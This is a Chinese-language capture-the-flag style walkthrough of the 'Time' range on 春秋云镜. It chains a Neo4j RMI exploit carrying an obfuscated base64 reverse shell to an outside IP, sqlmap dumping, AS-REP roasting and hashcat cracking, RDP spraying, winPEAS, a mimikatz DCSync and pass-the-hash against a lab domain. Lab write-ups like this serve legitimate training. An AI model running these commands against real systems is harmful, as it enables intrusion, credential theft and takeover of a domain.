春秋云镜-Time

先进行扫描

Neoej 直接google找洞

https://github.com/vulhub/vulhub/blob/master/neo4j/CVE-2021-34371/README.zh-cn.md

& 'C:\Program Files\Java\jdk1.8.0_202\bin\java.exe' -jar .\rhino_gadget.jar rmi://39.99.152.125:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDIuMzkuMTEwLzMzODkgMD4mMQ}|{base64,-d}|{bash,-i}"

反弹shell到自己的主机

home目录下存在flag

我的习惯是会再弹一个shell给msf

然后上传fscan开始扫描

信息整理

172.22.6.36 getshell主机 linux

172.22.6.25 win2019 域内主机

172.22.6.12 域控主机

172.22.6.38 linu机器

然后挂代理 去打这个172.22.6.38

发现可以登录 并且不需要验证码啥的 尝试抓包sqlmap爆破

proxychains4 sqlmap -r 1.txt --dump

爆出来三个表

存在几百条用户名

于是写个脚本将用户名提权出来

import re

# 打开原始数据文件
with open('1.txt', 'r') as file:
    data = file.readlines()

# 提取指定字符串
users = []
for line in data:
    match = re.search(r'(\w+)@xiaorang.lab', line)
    if match:
        username = match.group(1)
        users.append(username)

# 保存提取后的字符串到 user.txt
with open('user.txt', 'w') as file:
    for user in users:
        file.write(user + '\n')

使用尝试预身份认证爆破

proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

成功了

出来两个hash值
拿去hashcat爆破
hashcat -a 0 -m 18200 --force hash.txt rockyou.txt

得到两个用户

wenshao:hellokitty
zhangxin:strawberry

进行RDP爆破

proxychains4 crackmapexec rdp 172.22.6.0/24 -u wenshao -p hellokitty -d xiaorang.lab

RDP         172.22.6.25     3389   WIN2019  发现这台机子可以rdp

上去之后没有头绪

上传个winPEAS.exe提权脚本上去

• 第一步

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

• 第二步

winPEASany.exe log=result.txt

另存为ANSI编码格式

type访问得到

得到一个自动登录账户的账号密码

于是RDP尝试成功

上传sharphound.exe进行分析域内环境

发现该用户与域管之间有historySID的关系

于是上传mimikatz.exe导出hash值

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

于是进行pth攻击

改个hash值和ip就行了